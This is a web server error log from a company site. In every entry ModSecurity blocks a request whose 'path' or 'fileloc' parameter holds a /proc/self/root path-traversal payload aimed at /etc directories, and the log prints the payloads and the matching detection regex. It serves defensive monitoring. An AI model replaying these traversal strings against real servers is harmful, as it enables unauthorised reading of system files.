[Wed Mar 18 11:37:05.423050 2026] [:error] [pid 29882:tid 140411649607424] [client 74.7.243.128:56924] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq4kUzinOy1jxa1j4cehwAAAQs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:37:12.279639 2026] [:error] [pid 29882:tid 140411666392832] [client 74.7.243.128:59792] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq4mEzinOy1jxa1j4cejQAAAQk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:37:13.574814 2026] [:error] [pid 19507:tid 140411716749056] [client 74.7.243.128:38246] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq4mdY0UrI5A3LftIy4QwAAAYM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:37:14.908785 2026] [:error] [pid 17653:tid 140411658000128] [client 74.7.243.128:38252] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq4msdf6f5d65gmYZTecwAAAso"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:37:25.260574 2026] [:error] [pid 30077:tid 140411741927168] [client 74.7.243.128:38258] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq4pfu8EFLIOrSqIpsMzwAAAkA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:37:30.840160 2026] [:error] [pid 26799:tid 140411624429312] [client 74.7.243.128:59712] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq4qta6ubjKNq_cu4akmQAAA04"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:37:44.740660 2026] [:error] [pid 17887:tid 140411582465792] [client 74.7.243.128:39534] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq4uAkwaGbbGflqUZAYywAAANM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:37:49.943031 2026] [:error] [pid 31803:tid 140411607643904] [client 74.7.243.128:54456] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq4veyqAr6etmhZHNrLbgAAAFA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:37:54.683267 2026] [:error] [pid 26799:tid 140411708356352] [client 74.7.243.128:44092] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq4wta6ubjKNq_cu4akygAAA0Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:38:08.650097 2026] [:error] [pid 11816:tid 140411641214720] [client 74.7.243.128:44104] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq40Ow_le52K8_3pV3pBQAAAgw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:38:12.657613 2026] [:error] [pid 19507:tid 140411607643904] [client 74.7.243.128:57276] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq409Y0UrI5A3LftIy4dgAAAZA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:38:19.075043 2026] [:error] [pid 29882:tid 140411691570944] [client 74.7.241.31:47062] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq420zinOy1jxa1j4ce2wAAAQY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:38:20.606725 2026] [:error] [pid 15826:tid 140411540502272] [client 74.7.243.128:57292] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq43OoXxyEfFpUF8f92cgAAAVg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:38:21.932871 2026] [:error] [pid 11816:tid 140411733534464] [client 74.7.243.128:41096] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq43ew_le52K8_3pV3pCAAAAgE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:38:23.154262 2026] [:error] [pid 11816:tid 140411649607424] [client 74.7.243.128:41112] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq43-w_le52K8_3pV3pDAAAAgs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:38:24.481044 2026] [:error] [pid 26799:tid 140411616036608] [client 74.7.243.128:41122] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq44Na6ubjKNq_cu4ak5gAAA08"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:38:25.787106 2026] [:error] [pid 11816:tid 140411607643904] [client 74.7.243.128:41132] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/filesystems"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq44ew_le52K8_3pV3pEAAAAhA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:38:28.024565 2026] [:error] [pid 19507:tid 140411716749056] [client 74.7.243.128:41138] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq449Y0UrI5A3LftIy4hQAAAYM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:38:31.979566 2026] [:error] [pid 17653:tid 140411649607424] [client 74.7.243.128:37290] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq458df6f5d65gmYZTepAAAAss"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:38:33.326101 2026] [:error] [pid 30077:tid 140411565680384] [client 74.7.243.128:37298] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq46fu8EFLIOrSqIpsM7gAAAlU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:38:37.046075 2026] [:error] [pid 19507:tid 140411590858496] [client 74.7.243.128:37302] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq47dY0UrI5A3LftIy4iQAAAZI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
